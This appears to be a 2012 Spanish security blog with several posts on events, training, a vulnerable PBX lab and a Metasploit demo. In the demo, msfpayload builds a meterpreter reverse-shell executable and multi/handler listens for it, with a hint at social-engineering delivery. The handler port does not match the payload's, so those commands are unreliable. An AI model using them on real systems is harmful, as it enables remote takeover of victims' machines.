jueves, 15 de noviembre de 2012

Todos al BarcampSE Free For all

El evento es en 8 ciudades de Colombia de forma simultanea

martes, 13 de noviembre de 2012

Busy Tone Vulnerable PBX

Con el fin de poder realizar pruebas de seguridad sobre un ambiente controlado de VoIP y Comunicaciones Unificadas  @fixxx3r pone disponible Busy Tone Vulnerable PBX

 Fuente: busy-tone.org

Network Forensics en el SecZone

Si quieres ir al 2º Congreso de Seguridad Informática Security-Zone, aquí está tu oportunidad de conseguir una entrada. 

Link: nonroot

Quieres ir al Security Zone??

MINI RETO #4 XOR IT 

Este reto esta dedicado a todos aquellos que consideren que ganarse una entrada con un sorteo no es meritorio y prefieren hacer un poco mas de esfuerzo ;)
La primera persona que envíe la respuesta correcta al correo fernando.a.quintero AT gmail.com acompañada de un corto resumen explicando como logró solucionarlo se ganará una entrada* para el evento Security Zone que se realizará el 6 y 7 de Diciembre de 2012 en la ciudad de Cali, Colombia.



Muchas veces un XOR es solo el inicio, no pierdas la cabeza con este reto.

Bienvenido al mini reto #4 : XOR IT!
*Gastos adicionales como transporte, alimentación, alojamiento, cerveza, talleres, etc. NO están incluidos.

Buena suerte.

Fuente: nonroot

miércoles, 15 de febrero de 2012

Capacitación gratuita para realizar el CEH de EC-Council


Actualmente se han publicado 6 módulos para capacitarse gratis y realizar el CEH de EC-Council:
Fuente: DragonJar

BackTrack personalizado

Offensive-Security creadores de la distribución de seguridad informática por excelencia, BackTrack Linux, acaba de anunciar un nuevo servicio que permite a empresas, organizaciones y personas del común, personalizar algunas opciones de BackTrack para ajustarlo a sus necesidades particulares.


BackTrack ISO Customization Service from Offensive Security on Vimeo.

Fuente: DragonJar

jueves, 5 de enero de 2012

Metasploit en Windows Server 2008 R2 SP1

En esta demostración con fines educativos se observa un Windows Server 2008 R2 SP1 con IP 192.168.1.39 corriendo sobre un entorno virtualizado del servicio Hyper-V Virtualization y la conexión al equipo atacante mediante Putty (192.168.1.254) donde previamente se construye el archivo .exe, llamado C0lds0ft.exe:
 
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.254
LPORT=4444 X >/root/Escritorio/C0lds0ft.exe

Con este archivo generamos la conexión en reversa desde la víctima, y aquí el ingenio y las técnicas de ingeniería social que se utilice para hacerlo llegar al Target son las que usted tendrá que tener en cuenta para no caer en este tipo de técnicas. Posterior a enviado se procede a poner a la escucha así:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.254
set LPORT 444
exploit


Fuente segu-info